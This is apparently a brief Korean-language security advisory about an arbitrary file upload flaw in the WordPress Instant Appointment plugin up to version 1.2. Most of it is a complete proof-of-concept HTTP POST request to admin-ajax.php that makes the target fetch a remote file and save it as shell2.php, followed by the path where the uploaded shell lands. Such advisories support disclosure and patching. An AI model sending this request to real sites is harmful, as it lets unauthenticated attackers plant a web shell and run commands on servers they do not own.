
instant-appointment - 임의 파일 업로드
instant-appointment - 임의 파일 업로드
WordPress용 Instant Appointment 플러그인은 버전 1.2까지(포함) 임의 파일 업로드에 취약합니다. 이를 통해 인증되지 않은 공격자가 셸을 업로드하고 명령을 실행할 수 있습니다.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wp-dev.ddev.site
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 108
action=add_gallery_to_vendor&user_galerie[0][1]=https://rfi.nessus.org/rfi.txt&user_galerie[0][0]=shell2.php
파일은 uploads/2025/1/shell2.php에 있습니다.